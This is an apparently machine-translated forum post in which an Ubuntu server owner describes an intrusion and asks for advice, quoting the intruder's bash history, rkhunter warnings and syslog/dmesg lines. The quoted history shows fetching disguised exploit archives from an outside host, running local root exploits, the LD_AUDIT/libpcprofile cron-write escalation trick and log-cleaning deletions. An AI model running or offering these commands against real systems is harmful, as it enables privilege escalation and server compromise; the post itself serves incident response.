Взлом сервера Ubuntu

Я посмотрел на netstat и заметил, что кто-то кроме меня подключен к серверу через ssh. Я посмотрел после этого, потому что мой пользователь имеет только один доступ по SSH. Я нашел это в файле.bash_history пользователя ftp:

w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0  
dpkg -S /lib/libpcprofile.so 
ls -l /lib/libpcprofile.so 
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh 
vi a.sh 
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh .  ..  a.sh  .cache  ubuntu10.sh  ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd

Система в тюрьме. Имеет ли это значение в текущем случае? Что мне делать?

Спасибо всем!!

Я сделал это: - запретить подключенный хост ssh с iptables - остановил sshd в тюрьме - сохранено: bach_history, syslog, dmesg, файлы в строках wget bash_history

Я установил rkhunter и покажи его. Я запустил команду "unhide sys", и это привело к 1 скрытому процессу. Теперь я бегу rkhunter... ОК.

rkhunter -c вывел несколько предупреждений:

• в тюрьме: проверка того, разрешен ли root-доступ по SSH [предупреждение] проверка файла конфигурации syslog [предупреждение]

  Выполнение проверок файловой системы Проверка наличия скрытых файлов и каталогов [Предупреждение]

• хост-система: выполнение проверок файловой системы Проверка / dev на наличие подозрительных типов файлов [Предупреждение] Проверка на наличие скрытых файлов и каталогов [Предупреждение]

В dmesg и syslog я обнаружил, что хакер пытался что-то сделать с irda:

• системный журнал:

 28 февраля 22:48:41 ядро ​​i386: [4180166.230061] irda_init()
28 февраля 22:48:41 ядро ​​i386: [4180166.230077] NET: семейство зарегистрированных протоколов 23
28 февраля 22:48:46 ядро ​​i386: [4180171.242169] ioctl32(2.6.31:4726): неизвестно cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/ PTS /0
28 февраля 22:49:12 i386 sudo: pam_sm_authenticate: называется
28 февраля 22:49:12 i386 sudo: pam_sm_authenticate: username = [i]
28 февраля 22:49:12 i386 sudo: pam_sm_authenticate: /home/ я уже смонтирован
28 февраля 22:49:33 ядро ​​i386: [4180218.465341] может: ядро ​​сети контроллера (версия 20090105 abi 8)
28 февраля 22:49:33 ядро ​​i386: [4180218.465413] NET: семейство зарегистрированных протоколов 29
28 февраля 22:49:33 ядро ​​i386: [4180218.493398] может: протокол менеджера трансляции (версия 20090105 т)
Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 23:17:01 i386 CRON[10126]: (root) CMD (cd / && run-parts --report /etc/cron.hourly)
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: /home/i is already mounted 

• dmesg:

 [4180166.230061] irda_init()
[4180166.230077] NET: Registered protocol family 23
[4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
[4180218.465341] can: controller area network core (rev 20090105 abi 8)
[4180218.465413] NET: Registered protocol family 29
[4180218.493398] can: broadcast manager protocol (rev 20090105 t)
[4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team